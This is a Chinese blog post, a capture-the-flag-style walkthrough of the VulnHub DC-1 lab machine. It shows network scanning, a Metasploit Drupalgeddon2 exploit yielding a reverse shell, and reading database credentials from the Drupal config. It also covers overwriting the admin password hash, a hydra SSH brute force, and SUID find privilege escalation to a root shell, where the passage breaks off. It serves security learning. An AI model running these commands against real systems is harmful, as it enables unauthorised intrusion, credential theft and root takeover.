<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="Nayst"><meta name="copyright" content="Nayst"><meta name="generator" content="Hexo 6.2.0"><meta name="theme" content="hexo-theme-yun"><title>VulnHub_DC_1 | Nayst-blog</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.3.3/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/@unocss/runtime/mini.global.js"></script><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/svg+xml" href="/images/Doge.svg"><link rel="mask-icon" href="/images/Doge.svg" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"n4yst.github.io","root":"/","title":["Nayst","的","小","站"],"version":"1.10.3","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"local_search":{"path":"/search.xml"},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"fireworks":{"colors":null},"vendors":{"darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="介绍VulnHub靶场练习，练习渗透技巧，作为初学者，主要学习攻击方法。 在VMware中搭建环境，网络选择NAT或者桥接，确保攻击机和靶机在同一网络下即可，我这里选择的NAT。 靶机：192.168.254.129（DC-1） 攻击机：192.168.254.128（Kali） 物理机：192.168.254.1（Windows10） 信息搜集网络扫描渗透测试的第一步，网络探测。 作用：扫描靶机">
<meta property="og:type" content="article">
<meta property="og:title" content="VulnHub_DC_1">
<meta property="og:url" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/index.html">
<meta property="og:site_name" content="Nayst-blog">
<meta property="og:description" content="介绍VulnHub靶场练习，练习渗透技巧，作为初学者，主要学习攻击方法。 在VMware中搭建环境，网络选择NAT或者桥接，确保攻击机和靶机在同一网络下即可，我这里选择的NAT。 靶机：192.168.254.129（DC-1） 攻击机：192.168.254.128（Kali） 物理机：192.168.254.1（Windows10） 信息搜集网络扫描渗透测试的第一步，网络探测。 作用：扫描靶机">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407013729808.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407013931529.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407015439110.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407015550030.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407015752062.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407020613332.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407021149261.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407021411829.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407021624488.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407021947350.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407022644433.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407023005022.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407023723120.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407023851962.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407024421092.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407103850408.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407103939911.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407104141383.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407104842350.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407105131125.png">
<meta property="og:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407105231494.png">
<meta property="article:published_time" content="2022-04-06T16:37:24.000Z">
<meta property="article:modified_time" content="2022-04-19T09:03:12.167Z">
<meta property="article:author" content="Nayst">
<meta property="article:tag" content="练习">
<meta property="article:tag" content="靶场">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407013729808.png"><script>(function() {
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info mickey-mouse"><a class="site-author-avatar" href="/about/" title="Nayst"><img width="96" loading="lazy" src="/images/kakashi.png" alt="Nayst"><span class="site-author-status" title="永远相信美好的事情即将发生">😊</span></a><div class="site-author-name"><a href="/about/">Nayst</a></div><span class="site-name">Nayst-blog</span><sub class="site-subtitle">努力追赶师傅们的一只菜鸡</sub><div class="site-description"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">25</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">4</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">8</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" title="RSS" target="_blank" style="color:orange"><span class="icon iconify" data-icon="ri:rss-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/N4YST" title="GitHub" target="_blank" style="color:#181717"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" title="QQ 2495582918" target="_blank" style="color:#12B7F5"><span class="icon iconify" data-icon="ri:qq-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" title="wechat y1049843745" target="_blank" style="color:#1AAD19"><span class="icon iconify" data-icon="ri:wechat-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:2495582918@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><span class="icon iconify" data-icon="ri:mail-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:men-line"></span></a><a class="links-item hty-icon-button" href="/girls/" title="我的老婆们" style="color:pink"><span class="icon iconify" data-icon="ri:women-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86"><span class="toc-number">2.</span> <span class="toc-text">信息搜集</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BD%91%E7%BB%9C%E6%89%AB%E6%8F%8F"><span class="toc-number">2.1.</span> <span class="toc-text">网络扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E7%BD%91%E9%A1%B5%E7%9B%B8%E5%85%B3%E4%BF%A1%E6%81%AF"><span class="toc-number">2.2.</span> <span class="toc-text">查看网页相关信息</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F%E5%8F%8A%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">漏洞扫描及利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F"><span class="toc-number">3.1.</span> <span class="toc-text">漏洞扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.2.</span> <span class="toc-text">漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#flag"><span class="toc-number">4.</span> <span class="toc-text">flag</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag1"><span class="toc-number">4.1.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag2"><span class="toc-number">4.2.</span> <span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag3"><span class="toc-number">4.3.</span> <span class="toc-text">flag3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag4"><span class="toc-number">4.4.</span> <span class="toc-text">flag4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag5"><span class="toc-number">4.5.</span> <span class="toc-text">flag5</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%A6%E5%88%B0%E7%9A%84%E6%96%B9%E6%B3%95"><span class="toc-number">5.1.</span> <span class="toc-text">学到的方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">5.2.</span> <span class="toc-text">参考</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="http://N4YST.github.io/2022/04/07/VulnHub-DC-1/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Nayst"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Nayst-blog"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">VulnHub_DC_1</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <span class="post-meta-icon-text">发表于</span> <time title="创建时间：2022-04-07 00:37:24" itemprop="dateCreated datePublished" datetime="2022-04-07T00:37:24+08:00">2022-04-07</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <span class="post-meta-icon-text">更新于</span> <time title="修改时间：2022-04-19 17:03:12" itemprop="dateModified" datetime="2022-04-19T17:03:12+08:00">2022-04-19</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><span class="icon iconify" data-icon="ri:file-word-line"></span></span> <span title="本文字数">1.7k</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><span class="icon iconify" data-icon="ri:timer-line"></span></span> <span title="阅读时长">6m</span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">渗透测试</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/%E7%BB%83%E4%B9%A0/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">练习</span></a><a class="tag-item" href="/tags/%E9%9D%B6%E5%9C%BA/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">靶场</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><h1 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h1><p>VulnHub靶场练习，练习渗透技巧，作为初学者，主要学习攻击方法。</p>
<p>在VMware中搭建环境，网络选择NAT或者桥接，确保攻击机和靶机在同一网络下即可，我这里选择的NAT。</p>
<p>靶机：192.168.254.129（<a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-1,292/">DC-1</a>）</p>
<p>攻击机：192.168.254.128（Kali）</p>
<p>物理机：192.168.254.1（Windows10）</p>
<h1 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h1><h2 id="网络扫描"><a href="#网络扫描" class="headerlink" title="网络扫描"></a>网络扫描</h2><p>渗透测试的第一步，网络探测。</p>
<p>作用：扫描靶机的IP及端口号信息，可以知道目标开启了哪些端口和服务。</p>
<p>这里总结了三种方法：</p>
<ol>
<li>arp-scan</li>
</ol>
<p>用于探测同一区域中存活主机，一款kali自带的一款轻量<strong>ARP扫描工具</strong>，该工具会自动解析MAC地址，得到对应硬件厂商。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">sudo</span> arp-scan -l<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>常用指令：</p>
<ul>
<li>-f &lt;s&gt;从指定文件中读取主机名或地址：arp-scan -f IP.txt</li>
<li>-l 从网络接口配置生成地址</li>
<li>-i 各扫描之间的时间差 ：arp-scan -l -i 1000</li>
<li>-r 每个主机扫描次数 :arp-scan -r 5</li>
<li>-V 显示程序版本并退出</li>
<li>-t &lt;i&gt;设置主机超时时间 arp-scan -t 1000 10.10.10.0&#x2F;24</li>
<li>-I &lt;s&gt;使用网络接口 : arp-scan -I eth0</li>
<li>-g 不显示重复的数据</li>
<li>-D 显示数据包往返时间</li>
</ul>
<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407013729808.png" alt="image-20220407013729808" loading="lazy"></p>
<ol start="2">
<li>netdiscover</li>
</ol>
<p>用于探测存活主机</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">sudo</span> netdiscover -i eth0<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407013931529.png" alt="image-20220407013931529" loading="lazy"></p>
<ol start="3">
<li>NMap</li>
</ol>
<p>也就是Network Mapper，其基本功能有三个：</p>
<p>（1）扫描主机端口，嗅探所提供的网络服务。</p>
<p>（2）探测一组主机是否在线。</p>
<p>（3）推断主机所用的操作系统，到达主机经过的路由，系统已开放端口的软件版本。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ nmap -sn <span class="token number">192.168</span>.254.1/24

-sn 仅扫描主机，不扫描端口<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407015439110.png" alt="image-20220407015439110" loading="lazy"></p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ nmap -sV -p- <span class="token number">192.168</span>.0.119

-sV 用来扫描目标主机和端口上运行的软件的版本
-p- 扫描0-65535全部端口<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407015550030.png" alt="image-20220407015550030" loading="lazy"></p>
<p>目标靶机开放了80端口，在浏览器打开该站点</p>
<h2 id="查看网页相关信息"><a href="#查看网页相关信息" class="headerlink" title="查看网页相关信息"></a>查看网页相关信息</h2><p>使用插件<code>wappalyzer</code>查看网站的相关信息。</p>
<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407015752062.png" alt="image-20220407015752062" loading="lazy"></p>
<p>可以看到该网站使用CMS为<code>Drupal</code>，版本号为<code>7</code>，其实在网页界面和底部都能发现是Drupal。</p>
<h1 id="漏洞扫描及利用"><a href="#漏洞扫描及利用" class="headerlink" title="漏洞扫描及利用"></a>漏洞扫描及利用</h1><h2 id="漏洞扫描"><a href="#漏洞扫描" class="headerlink" title="漏洞扫描"></a>漏洞扫描</h2><p>在 MSF 中搜索 Drupal</p>
<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407020613332.png" alt="image-20220407020613332" loading="lazy"></p>
<p>可以看到共有8个漏洞</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><p>在8个漏洞中，优先选择Rank为Excellent，且更新时间最新的。</p>
<p>这里就选择第二个（drupal_drupalgeddon2），查看他需要哪些参数，把参数补充完整。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ use <span class="token number">1</span>
$ show options
$ <span class="token builtin class-name">set</span> RHOST <span class="token number">192.168</span>.254.129<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407021149261.png" alt="image-20220407021149261" loading="lazy"></p>
<p>成功利用并反弹shell！</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ exploit

<span class="token comment">#run也是可以的</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407021411829.png" alt="image-20220407021411829" loading="lazy"></p>
<h1 id="flag"><a href="#flag" class="headerlink" title="flag"></a>flag</h1><h2 id="flag1"><a href="#flag1" class="headerlink" title="flag1"></a>flag1</h2><p>在当前目录下发现<code>flag1.txt</code>。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">cat</span> flag1.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407021624488.png" alt="image-20220407021624488" loading="lazy"></p>
<blockquote>
<p>Every good CMS needs a config file - and so do you.</p>
</blockquote>
<p>翻译过来就是：每个好的CMS都需要一个配置文件 - 你也是。</p>
<p>提示我们下一步：找配置文件。</p>
<h2 id="flag2"><a href="#flag2" class="headerlink" title="flag2"></a>flag2</h2><p>Drupal的默认配置文件为 <code>/var/www/sites/default/settings.php</code>，这里没有改路径，所以很轻松就拿到了。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">cat</span> sites/default/settings.php<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407021947350.png" alt="image-20220407021947350" loading="lazy"></p>
<p>成功拿到<code>flag2</code>和SQL数据库账户</p>
<blockquote>
<p>Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access).</p>
<p>What can you do with these credentials?</p>
</blockquote>
<p>翻译过来就是：蛮力和字典攻击不行，唯一方法是获得访问权限(你将需要访问的)。你能用这些凭证做什么?</p>
<p>这里提示我们<strong>提权</strong>，先看看数据库里有什么吧。</p>
<h2 id="flag3"><a href="#flag3" class="headerlink" title="flag3"></a>flag3</h2><p>有了账号密码可以登录数据库，前提是要有一个<strong>交互式shell</strong>。</p>
<p>这里利用python反弹一个交互式shell，然后登录数据库。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ python -c <span class="token string">'import pty; pty.spawn("/bin/bash")'</span>

$ mysql -udbuser -pR0ck3t<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407022644433.png" alt="image-20220407022644433" loading="lazy"></p>
<p>通过查询发现admin用户的账号和密码！</p>
<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407023005022.png" alt="image-20220407023005022" loading="lazy"></p>
<p>显然是通过加密后的，可以想办法更新密码。参考<a target="_blank" rel="noopener" href="https://drupalchina.cn/node/2128">忘记Drupal的管理员密码的解决办法</a>。</p>
<p>通过使用脚本加密明文后覆盖管理员密码。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ php scripts/password-hash.sh <span class="token number">123456</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-mysql" data-language="mysql"><code class="language-mysql">update drupaldb.users set pass &#x3D; &quot;$S$DzvV5UtPzee8dAs0n&#x2F;dgWpbNvwm98YP8YX8WBM3zbpM04PIBN77G&quot; where name &#x3D; &quot;admin&quot;;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407023723120.png" alt="image-20220407023723120" loading="lazy"></p>
<p>成功以管理员身份登录！</p>
<p>在<code>content</code>页面拿到<code>flag3</code></p>
<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407023851962.png" alt="image-20220407023851962" loading="lazy"></p>
<blockquote>
<p>Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow.</p>
</blockquote>
<p>翻译：特殊的PERMS将帮助找到passwd - 但你需要执行该命令来弄清楚如何获得阴影中的东西。</p>
<p>提示下一步：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/davis12/p/14373311.html">passwd</a>和<a target="_blank" rel="noopener" href="http://c.biancheng.net/view/840.html">shadow</a>，还有<code>perms</code>、<code>find</code>、<code>-exec</code>这些都是提权用的。</p>
<h2 id="flag4"><a href="#flag4" class="headerlink" title="flag4"></a>flag4</h2><p>查看passwd文件，发现flag4用户</p>
<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407024421092.png" alt="image-20220407024421092" loading="lazy"></p>
<p>进入该用户目录下，发现<code>flag4.txt</code>，尝试读取发现无权限。</p>
<p><a target="_blank" rel="noopener" href="http://www.ha97.com/5186.html">hydra</a>爆破<code>flag4</code>用户密码。</p>
<p>靶机已开启22端口的ssh服务，可以尝试暴力破解密码</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">sudo</span> hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz <span class="token number">192.168</span>.254.129 <span class="token function">ssh</span>
或者
$ <span class="token function">sudo</span> hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.254.129

-l  指定破解的用户
-P  指定密码字典
ssh://ip 指定使用协议和ip地址<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407103850408.png" alt="image-20220407103850408" loading="lazy"></p>
<p>登录靶机</p>
<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407103939911.png" alt="image-20220407103939911" loading="lazy"></p>
<p>也可以kali远程连接</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">ssh</span> flag4@192.168.254.129<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407104141383.png" alt="image-20220407104141383" loading="lazy"></p>
<p>成功拿到<code>flag4</code></p>
<blockquote>
<p>Can you use this same method to find or access the flag in root?</p>
<p>Probably. But perhaps it’s not that easy.  Or maybe it is?</p>
</blockquote>
<p>根据flag3和flag4可知需要root权限。</p>
<h2 id="flag5"><a href="#flag5" class="headerlink" title="flag5"></a>flag5</h2><p>利用<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/272617.html">suid提权</a>。</p>
<blockquote>
<p>SUID可以让调用者以文件拥有者的身份运行该文件，所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件，那么我们运行该文件的时候就得获得root用户的身份了。</p>
</blockquote>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token comment">#查找具有root权限的SUID的文件</span>
$ <span class="token function">find</span> / -perm -u<span class="token operator">=</span>s -type f <span class="token operator"><span class="token file-descriptor important">2</span>></span>/dev/null<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<blockquote>
<p>-perm 是代表按指定权限搜索</p>
<p>-u&#x3D;s 其中u代表当前用户的权限，s 代表 suid 权限，- 号代表至少需要满足指定的权限，可以有更多的权限，但是不能少了这个指定权限</p>
<p>-tpye 代表搜索指定的类型，f代表文件</p>
<p>2&gt;&#x2F;dev&#x2F;null 代表将不显示错误信息</p>
</blockquote>
<p><img src="http://n4yst.github.io/2022/04/07/VulnHub-DC-1/04/07/VulnHub-DC-1/image-20220407104842350.png" alt="image-20220407104842350" loading="lazy"></p>
<p>可以看到这些命令都可以以root权限运行，这里用find。</p>
<p>如果find以SUID权限运行，所有通过find执行的命令都会以root权限运行。</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">$ <span class="token function">touch</span> nayst
<span class="token comment">#查找当前目录下名为nayst的文件并执行shell</span>
$ <span class="token function">find</span> ./ -name nayst -exec <span class="token string">"/bin/sh"</span> <span class="token punctuation">\</span><span class="token punctuation">;</span>

